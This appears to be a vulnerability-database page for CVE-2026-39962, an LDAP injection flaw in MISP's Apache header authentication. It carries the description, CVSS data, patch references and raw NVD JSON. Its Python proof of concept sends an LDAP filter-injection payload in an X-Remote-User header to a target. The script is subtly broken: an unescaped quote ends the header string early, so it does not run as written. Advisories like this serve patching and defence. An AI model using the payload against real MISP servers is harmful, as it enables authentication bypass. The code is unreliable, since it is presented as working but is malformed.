CVE-2026-39962

Description

MISP is an open source threat intelligence and sharing platform. Prior to 2.5.36, improper neutralization of special elements in an LDAP query in ApacheAuthenticate.php allows LDAP injection via an unsanitized username value when ApacheAuthenticate.apacheEnv is configured to use a user-controlled server variable instead of REMOTE_USER (such as in certain proxy setups). An attacker able to control that value can manipulate the LDAP search filter and potentially bypass authentication constraints or cause unauthorized LDAP queries. This vulnerability is fixed in 2.5.36.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:* - VULNERABLE

MISP < 2.5.36

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-39962: MISP LDAP Injection
# This script demonstrates sending a malicious header to test for LDAP injection.
# It requires the target MISP to be configured to use a user-controlled header for auth.

import requests

def exploit(target_url):
    headers = {
        "User-Agent": "CVE-2026-39962-PoC",
        # Example header configuration, adjust based on target's apacheEnv setting
        "X-Remote-User": "*")(uid=*))(|"
    }
    
    try:
        response = requests.get(target_url, headers=headers)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check backend for LDAP query execution.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080"
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39962
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39962
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39962/
[4] VulDB https://vuldb.com/cve/CVE-2026-39962
[5] https://github.com/MISP/MISP/commit/380ee4136a7d9ce2fe63fce06d517839f30aba10
[6] https://github.com/MISP/MISP/commit/d7d671ea8f5822e91207dcad2003c35c30092a32
[7] https://github.com/MISP/MISP/releases/tag/v2.5.36
[8] https://github.com/MISP/MISP/security/advisories/GHSA-mc53-48w8-9g63

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39962", "sourceIdentifier": "[email protected]", "published": "2026-04-09T17:16:30.600", "lastModified": "2026-04-23T15:09:47.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MISP is an open source threat intelligence and sharing platform. Prior to 2.5.36, improper neutralization of special elements in an LDAP query in ApacheAuthenticate.php allows LDAP injection via an unsanitized username value when ApacheAuthenticate.apacheEnv is configured to use a user-controlled server variable instead of REMOTE_USER (such as in certain proxy setups). An attacker able to control that value can manipulate the LDAP search filter and potentially bypass authentication constraints or cause unauthorized LDAP queries. This vulnerability is fixed in 2.5.36."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.36", "matchCriteriaId": "AE212921-7D3E-4CAB-9C6E-36D888281C0A"}]}]}], "references": [{"url": "https://github.com/MISP/MISP/commit/380ee4136a7d9ce2fe63fce06d517839f30aba10", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MISP/MISP/commit/d7d671ea8f5822e91207dcad2003c35c30092a32", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MISP/MISP/releases/tag/v2.5.36", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/MISP/MISP/security/advisories/GHSA-mc53-48w8-9g63", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}